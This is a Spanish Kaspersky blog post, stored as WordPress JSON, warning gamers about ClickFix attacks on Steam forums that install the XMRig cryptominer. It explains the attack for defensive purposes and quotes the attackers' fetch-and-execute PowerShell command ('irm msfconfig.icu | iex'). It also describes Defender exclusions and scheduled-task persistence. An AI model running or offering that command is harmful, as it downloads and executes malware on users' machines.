{"id":32393,"date":"2026-08-26T11:00:53","date_gmt":"2026-08-26T09:00:53","guid":{"rendered":"https:\/\/www.kaspersky.es\/blog\/?p=32393"},"modified":"2026-08-25T17:59:10","modified_gmt":"2026-08-25T15:59:10","slug":"steam-forum-clickfix-attack-irm-iex","status":"publish","type":"post","link":"https:\/\/www.kaspersky.es\/blog\/steam-forum-clickfix-attack-irm-iex\/32393\/","title":{"rendered":"Malos consejos para los jugadores: ClickFix llega a los foros de Steam"},"content":{"rendered":"<p>Este a\u00f1o ha sido testigo de un verdadero auge de los ataques de <a href=\"https:\/\/www.kaspersky.com\/blog\/what-is-clickfix\/53348\/\" target=\"_blank\" rel=\"noopener nofollow\">ClickFix<\/a>. Tiene tanto \u00e9xito entre los delincuentes que apenas terminamos de escribir sobre una variaci\u00f3n, es hora de cubrir la siguiente.<\/p>\n<p>Esta vez, los atacantes est\u00e1n apuntando a los jugadores: los periodistas de tecnolog\u00eda <a href=\"https:\/\/www.bleepingcomputer.com\/news\/security\/steam-forum-clickfix-attacks-infect-gamers-with-xmrig-cryptominers\/\" target=\"_blank\" rel=\"noopener nofollow\">detectaron publicaciones que ofrec\u00edan consejos maliciosos<\/a> en los foros de Steam. Aqu\u00ed detallamos c\u00f3mo se ven estas publicaciones, qu\u00e9 malware suelen propagar y c\u00f3mo mantener seguro tu dispositivo.<\/p>\n<h2>ClickFix llega a los foros de Steam<\/h2>\n<p>Muchos jugadores recurren a sus compa\u00f1eros en los foros de Steam en busca de ayuda y consejos sobre cuestiones como superar una misi\u00f3n complicada, subir de nivel, conseguir el mejor bot\u00edn o solucionar un error. Y es precisamente esta confianza en los consejos de la comunidad lo que los atacantes han decidido aprovechar.<\/p>\n<p>El ataque comienza cuando los delincuentes responden a la pregunta de alguien sobre fallos del juego, elementos faltantes del inventario u otros problemas t\u00e9cnicos. Haci\u00e9ndose pasar por comentaristas \u00fatiles, sugieren abrir PowerShell como administrador y ejecutar un comando que supuestamente soluciona el problema que tiene el usuario.<\/p>\n<div id=\"attachment_32398\" style=\"width: 1329px\" class=\"wp-caption aligncenter\"><a href=\"https:\/\/media.kasperskydaily.com\/wp-content\/uploads\/sites\/88\/2026\/08\/25175538\/steam-forum-clickfix-attack-irm-iex-1.jpg\"><img loading=\"lazy\" decoding=\"async\" aria-describedby=\"caption-attachment-32398\" class=\"wp-image-32398 size-full\" title=\"Publicaci\u00f3n de un actor malicioso en un foro de Steam\" src=\"https:\/\/media.kasperskydaily.com\/wp-content\/uploads\/sites\/88\/2026\/08\/25175538\/steam-forum-clickfix-attack-irm-iex-1.jpg\" alt=\"Publicaci\u00f3n de un actor malicioso en un foro de Steam\" width=\"1319\" height=\"947\"><\/a><p id=\"caption-attachment-32398\" class=\"wp-caption-text\">Disfrazando su publicaci\u00f3n como un consejo para la resoluci\u00f3n de un problema, el actor malicioso sugiere abrir PowerShell como administrador y ejecutar un comando que supuestamente soluciona el problema del usuario. <a href=\"https:\/\/www.bleepingcomputer.com\/news\/security\/steam-forum-clickfix-attacks-infect-gamers-with-xmrig-cryptominers\/\" target=\"_blank\" rel=\"nofollow noopener\"> Fuente <\/a><\/p><\/div>\n<p>Como puedes suponer, ejecutar el comando no soluciona nada, solo abre una nueva caja de Pandora. Esa es la idea detr\u00e1s de ClickFix: usar la ingenier\u00eda social para enga\u00f1ar a las v\u00edctimas a fin de que realicen ellas mismas acciones inseguras mientras les dan a los estafadores lo que necesitan para poner en riesgo el dispositivo. Hemos cubierto otros trucos de ClickFix antes (CAPTCHA falsos, errores falsos del navegador y m\u00e1s), los cuales se basan en lograr que la v\u00edctima ejecute el comando malicioso por su cuenta. Puedes leer m\u00e1s sobre las <a href=\"https:\/\/www.kaspersky.es\/blog\/clickfix-attack-variations\/31917\/\" target=\"_blank\" rel=\"noopener\">diferentes variaciones de los ataques de ClickFix<\/a> en nuestra publicaci\u00f3n anterior.<\/p>\n<p>La astucia de usar ClickFix en los foros de Steam es que el ataque puede afectar no solo al jugador que ha pedido ayuda; muchos otros jugadores que tienen el mismo problema y encuentran la respuesta a trav\u00e9s de una b\u00fasqueda en Google tambi\u00e9n pueden caer en la trampa.<\/p>\n<h2>Una introducci\u00f3n r\u00e1pida: lo que realmente hay detr\u00e1s del comando <em>irm <\/em>| <em>iex<\/em><\/h2>\n<p>Antes de adentrarnos en qu\u00e9 consiguen los atacantes que los jugadores instalen de esta manera, debemos cubrir algunos antecedentes t\u00e9cnicos. En primer lugar, las publicaciones en los foros de Steam aconsejan a las posibles v\u00edctimas desprevenidas que ejecuten el siguiente comando en PowerShell:<br>\n<code> irm msfconfig.icu | iex <\/code><\/p>\n<p>Para alguien que no est\u00e9 \u00edntimamente familiarizado con PowerShell, esta l\u00ednea puede parecer bastante inocua: se parece a la ejecuci\u00f3n de MSConfig, la utilidad de configuraci\u00f3n del sistema integrada de Windows, con algunos par\u00e1metros adicionales.<\/p>\n<p>Sin embargo, es todo menos inofensivo. Analicemos qu\u00e9 hace realmente cada parte de este comando:<\/p>\n<ol>\n<li><strong><em>irm<\/em><\/strong> es la abreviatura del comando integrado de PowerShell <em>Invoke-RestMethod<\/em>. Se comunica con la direcci\u00f3n web especificada m\u00e1s adelante en la l\u00ednea y recupera datos en respuesta.<\/li>\n<li><strong><em>icu<\/em><\/strong> es esa direcci\u00f3n web, no el nombre de alg\u00fan archivo local como podr\u00eda parecer a primera vista. Se trata del servidor de los atacantes y responde a la solicitud de <strong><em>irm<\/em><\/strong> con un script de PowerShell malicioso.<\/li>\n<li><strong><em>iex<\/em><\/strong> es otro comando integrado de PowerShell, <em>Invoke-Expression<\/em>. Toma todo lo que <strong><em>irm<\/em><\/strong> recibe de esa direcci\u00f3n web y lo ejecuta como c\u00f3digo de PowerShell.<\/li>\n<\/ol>\n<p>Una vez ejecutada, esta l\u00ednea de c\u00f3digo de PowerShell descarga un script del sitio especificado y lo ejecuta de inmediato. Como <a href=\"https:\/\/www.reddit.com\/r\/PowerShell\/comments\/181l9lh\/what_is_irm_httpsmassgravedevget_iex\/\" target=\"_blank\" rel=\"noopener nofollow\">ha se\u00f1alado<\/a> correctamente un usuario de Reddit, puedes averiguar con seguridad qu\u00e9 c\u00f3digo se descargar\u00eda realmente en tu dispositivo, sin el riesgo de que se ejecute, simplemente si eliminas la segunda parte, <strong><em>iex<\/em><\/strong>. Sin esa parte, el comando solo descargar\u00e1 el contenido del script y lo imprimir\u00e1 en la ventana de PowerShell sin ejecutarlo. Este es el c\u00f3digo completo y no oculto que se te solicita que ejecutes en tu dispositivo. A continuaci\u00f3n, veamos lo que estos \u00fatiles foristas de Steam realmente intentan que los jugadores instalen en sus m\u00e1quinas.<\/p>\n<h2>Un criptominero, no una herramienta de optimizaci\u00f3n<\/h2>\n<p>Los atacantes hicieron su tarea: el script de PowerShell descargado de su servidor hace un trabajo convincente al imitar una utilidad de optimizaci\u00f3n de Windows. Una vez iniciada, le muestra al usuario una serie de notificaciones que afirman borrar archivos temporales, vaciar la cach\u00e9 de DNS, actualizar controladores, verificar el disco en busca de errores, desactivar aplicaciones de inicio innecesarias, analizar el sistema en busca de malware, reparar la imagen de Windows y verificar la integridad de los archivos del sistema.<\/p>\n<div id=\"attachment_32397\" style=\"width: 960px\" class=\"wp-caption aligncenter\"><a href=\"https:\/\/media.kasperskydaily.com\/wp-content\/uploads\/sites\/88\/2026\/08\/25175347\/steam-forum-clickfix-attack-irm-iex-2.jpg\"><img loading=\"lazy\" decoding=\"async\" aria-describedby=\"caption-attachment-32397\" class=\"wp-image-32397 size-full\" title=\"Optimizaci\u00f3n falsa de Windows en curso\" src=\"https:\/\/media.kasperskydaily.com\/wp-content\/uploads\/sites\/88\/2026\/08\/25175347\/steam-forum-clickfix-attack-irm-iex-2.jpg\" alt=\"Optimizaci\u00f3n falsa de Windows en curso\" width=\"950\" height=\"436\"><\/a><p id=\"caption-attachment-32397\" class=\"wp-caption-text\">El script muestra un flujo de mensajes sobre varias tareas de optimizaci\u00f3n falsas para que parezca que est\u00e1 haciendo un mantenimiento \u00fatil. <a href=\"https:\/\/www.bleepingcomputer.com\/news\/security\/steam-forum-clickfix-attacks-infect-gamers-with-xmrig-cryptominers\/\" target=\"_blank\" rel=\"nofollow noopener\"> Fuente <\/a><\/p><\/div>\n<p>La actividad real, mientras tanto, ocurre entre bastidores. Como primer paso, el script verifica si se est\u00e1 ejecutando con privilegios de administrador. Si es as\u00ed, crea una carpeta de trabajo oculta en <em>C:\\Windows\\Background<\/em> y la a\u00f1ade a la lista de exclusi\u00f3n de Microsoft Defender. A partir de ese momento, cualquier archivo que se coloca en esa carpeta dejar\u00e1 de ser analizado por el antivirus integrado de Windows.<\/p>\n<p>A continuaci\u00f3n, el script prepara el sistema para la siguiente etapa del ataque y descarga un ejecutable del servidor de los atacantes, guard\u00e1ndolo en la misma carpeta <em>C:\\Windows\\Background<\/em> con un nombre que suena leg\u00edtimo: <em>system.exe<\/em>.<\/p>\n<p>El archivo descargado es <em>XMRig<\/em>, una de las herramientas m\u00e1s populares para minar la criptomoneda Monero. <em>XMRig<\/em> en s\u00ed mismo no es malware; es una herramienta de miner\u00eda de c\u00f3digo abierto leg\u00edtima. El problema es que los atacantes lo instalan en los equipos de las v\u00edctimas sin su conocimiento. Una vez que se est\u00e1 ejecutando, la potencia de c\u00e1lculo del dispositivo se secuestra para la miner\u00eda de Monero, y la criptomoneda resultante va directamente a los delincuentes.<\/p>\n<p>Esto hace que las plataformas de los jugadores sean objetivos especialmente atractivos: los PC de juegos modernos incluyen CPU y GPU potentes, exactamente el tipo de hardware que es excelente para la criptominer\u00eda.<\/p>\n<p>Para asegurarse de que el malware sobreviva a un reinicio, la secuencia de comandos tambi\u00e9n crea una nueva tarea en el Programador de tareas de Windows: <em>XMRig-{nombre del equipo}<\/em>. A partir de ese momento, inicia autom\u00e1ticamente el criptominero cada vez que se inicia el sistema.<\/p>\n<h2>C\u00f3mo proteger tu dispositivo de los criptomineros y otro tipo de malware<\/h2>\n<p>Desafortunadamente, muchos jugadores se muestran reacios a instalar software de seguridad o mantenerlo en ejecuci\u00f3n en sus dispositivos. El principal culpable es el mito persistente de que \u201cun antivirus ralentiza el juego\u201d. Hemos cubierto investigaciones sobre esto en nuestro blog antes y los resultados <a href=\"https:\/\/www.kaspersky.es\/blog\/tests-gamers-antiviruses\/28564\/\" target=\"_blank\" rel=\"noopener\">no han mostrado un impacto significativo en el rendimiento<\/a> por ejecutar un antivirus durante los juegos.<\/p>\n<p>Sin embargo, no se puede decir lo mismo de los criptomineros: definitivamente perjudican el rendimiento y desgastan tu hardware m\u00e1s r\u00e1pido. Entonces, \u00bfqu\u00e9 puedes hacer para mantener tus cuentas y tu PC para juegos fuera de peligro?<\/p>\n<ul>\n<li>Evita ejecutar PowerShell, Terminal u otros scripts de la l\u00ednea de comandos que las personas extra\u00f1as te sugieran que copies y ejecutes, ya sea en foros, chats o comentarios.<\/li>\n<li>Antes de pulsar <em>Intro<\/em> en cualquier comando que no comprendas completamente, busca lo que hace y las posibles consecuencias de ejecutarlo.<\/li>\n<li>Utiliza una <a href=\"https:\/\/www.kaspersky.es\/premium?icid=es_bb2022-kdplacehd_acq_ona_smm__onl_b2c_kdaily_lnk_sm-team___kprem___\" target=\"_blank\" rel=\"noopener\">soluci\u00f3n de seguridad fiable con modo de juego<\/a>\u00a0que marque a tiempo los intentos de descarga de malware y evite que se ejecuten.<\/li>\n<li>No desactives la <a href=\"https:\/\/www.kaspersky.es\/premium?icid=es_bb2022-kdplacehd_acq_ona_smm__onl_b2c_kdaily_lnk_sm-team___kprem___\" target=\"_blank\" rel=\"noopener\">protecci\u00f3n<\/a> mientras juegas. Usar una soluci\u00f3n con un modo de juego exclusivo es el camino a seguir. <a href=\"https:\/\/www.kaspersky.es\/home-security?icid=es_kdailyplacehold_acq_ona_smm__onl_b2c_blo_lnk_sm-team______\" target=\"_blank\" rel=\"noopener\">Los productos de seguridad de Kaspersky<\/a> activan autom\u00e1ticamente ese modo tan pronto como se inicie un juego y retrasan las actualizaciones de bases de datos antivirus, las notificaciones y los an\u00e1lisis de disco programados hasta que hayas terminado de jugar.<\/li>\n<\/ul>\n<blockquote><p>\u00bfTienes curiosidad por saber de qu\u00e9 otra manera los atacantes apuntan a los jugadores? Echa un vistazo a nuestras otras publicaciones:<\/p>\n<ul>\n<li><a href=\"https:\/\/www.kaspersky.com\/blog\/windows-stealer-stealka\/55058\/\" target=\"_blank\" rel=\"noopener nofollow\"><strong>Ladr\u00f3n Stealka: la nueva cara de trucos, modificaciones y cracks de juegos<\/strong><\/a><\/li>\n<li><a href=\"https:\/\/www.kaspersky.com\/blog\/update-unity-games-cve-2025-59489\/54542\/\" target=\"_blank\" rel=\"noopener nofollow\"><strong>Vulnerabilidad en el motor de juegos de Unity<\/strong><\/a><\/li>\n<li><a href=\"https:\/\/www.kaspersky.com\/blog\/gamer-malware-endgame-gear-steam-minecraft\/54336\/\" target=\"_blank\" rel=\"noopener nofollow\"><strong>Jugadores bajo fuego: malware en los sitios web oficiales<\/strong><\/a><\/li>\n<li><a href=\"https:\/\/www.kaspersky.com\/blog\/arcane-stealer-instead-of-cheats-for-minecraft\/53178\/\" target=\"_blank\" rel=\"noopener nofollow\"><strong>Ladr\u00f3n Arcane en lugar de trucos de Minecraft<\/strong><\/a><\/li>\n<li><a href=\"https:\/\/www.kaspersky.es\/blog\/games-with-trojans-in-steam\/30774\/\" target=\"_blank\" rel=\"noopener\"><strong>Atenci\u00f3n, jugadores: los troyanos han invadido Steam<\/strong><\/a><\/li>\n<\/ul>\n<\/blockquote>\n<input type=\"hidden\" class=\"category_for_banner\" value=\"premium-gamer\">\n","protected":false},"excerpt":{"rendered":"<p>Los foros de Steam son el campo de batalla definitivo para los ataques de ClickFix. Desglosamos c\u00f3mo los atacantes se disfrazan de comentaristas \u00fatiles con el fin de enga\u00f1ar a los jugadores para que instalen un criptominero en sus PC.<\/p>\n","protected":false},"author":2726,"featured_media":32394,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"footnotes":""},"categories":[1348],"tags":[3717,3783,2368,614,735,777,22,3784,134,23],"class_list":["post-32393","post","type-post","status-publish","format-standard","has-post-thumbnail","category-threats","tag-clickfix","tag-criptomineros","tag-criptomonedas","tag-ingenieria-social","tag-juegos","tag-jugadores","tag-malware-2","tag-powershell","tag-steam","tag-windows"],"hreflang":[{"hreflang":"es","url":"https:\/\/www.kaspersky.es\/blog\/steam-forum-clickfix-attack-irm-iex\/32393\/"},{"hreflang":"en-in","url":"https:\/\/www.kaspersky.co.in\/blog\/steam-forum-clickfix-attack-irm-iex\/30986\/"},{"hreflang":"en-ae","url":"https:\/\/me-en.kaspersky.com\/blog\/steam-forum-clickfix-attack-irm-iex\/26013\/"},{"hreflang":"ar","url":"https:\/\/me.kaspersky.com\/blog\/steam-forum-clickfix-attack-irm-iex\/13627\/"},{"hreflang":"en-gb","url":"https:\/\/www.kaspersky.co.uk\/blog\/steam-forum-clickfix-attack-irm-iex\/30815\/"},{"hreflang":"es-mx","url":"https:\/\/latam.kaspersky.com\/blog\/steam-forum-clickfix-attack-irm-iex\/29435\/"},{"hreflang":"it","url":"https:\/\/www.kaspersky.it\/blog\/steam-forum-clickfix-attack-irm-iex\/30941\/"},{"hreflang":"ru","url":"https:\/\/www.kaspersky.ru\/blog\/steam-forum-clickfix-attack-irm-iex\/42526\/"},{"hreflang":"x-default","url":"https:\/\/www.kaspersky.com\/blog\/steam-forum-clickfix-attack-irm-iex\/56285\/"},{"hreflang":"fr","url":"https:\/\/www.kaspersky.fr\/blog\/steam-forum-clickfix-attack-irm-iex\/24214\/"},{"hreflang":"ru-kz","url":"https:\/\/blog.kaspersky.kz\/steam-forum-clickfix-attack-irm-iex\/30952\/"},{"hreflang":"en-au","url":"https:\/\/www.kaspersky.com.au\/blog\/steam-forum-clickfix-attack-irm-iex\/36479\/"},{"hreflang":"en-za","url":"https:\/\/www.kaspersky.co.za\/blog\/steam-forum-clickfix-attack-irm-iex\/36393\/"}],"acf":[],"banners":"","maintag":{"url":"https:\/\/www.kaspersky.es\/blog\/tag\/jugadores\/","name":"jugadores"},"_links":{"self":[{"href":"https:\/\/www.kaspersky.es\/blog\/wp-json\/wp\/v2\/posts\/32393","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.kaspersky.es\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.kaspersky.es\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.kaspersky.es\/blog\/wp-json\/wp\/v2\/users\/2726"}],"replies":[{"embeddable":true,"href":"https:\/\/www.kaspersky.es\/blog\/wp-json\/wp\/v2\/comments?post=32393"}],"version-history":[{"count":3,"href":"https:\/\/www.kaspersky.es\/blog\/wp-json\/wp\/v2\/posts\/32393\/revisions"}],"predecessor-version":[{"id":32399,"href":"https:\/\/www.kaspersky.es\/blog\/wp-json\/wp\/v2\/posts\/32393\/revisions\/32399"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.kaspersky.es\/blog\/wp-json\/wp\/v2\/media\/32394"}],"wp:attachment":[{"href":"https:\/\/www.kaspersky.es\/blog\/wp-json\/wp\/v2\/media?parent=32393"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.kaspersky.es\/blog\/wp-json\/wp\/v2\/categories?post=32393"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.kaspersky.es\/blog\/wp-json\/wp\/v2\/tags?post=32393"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}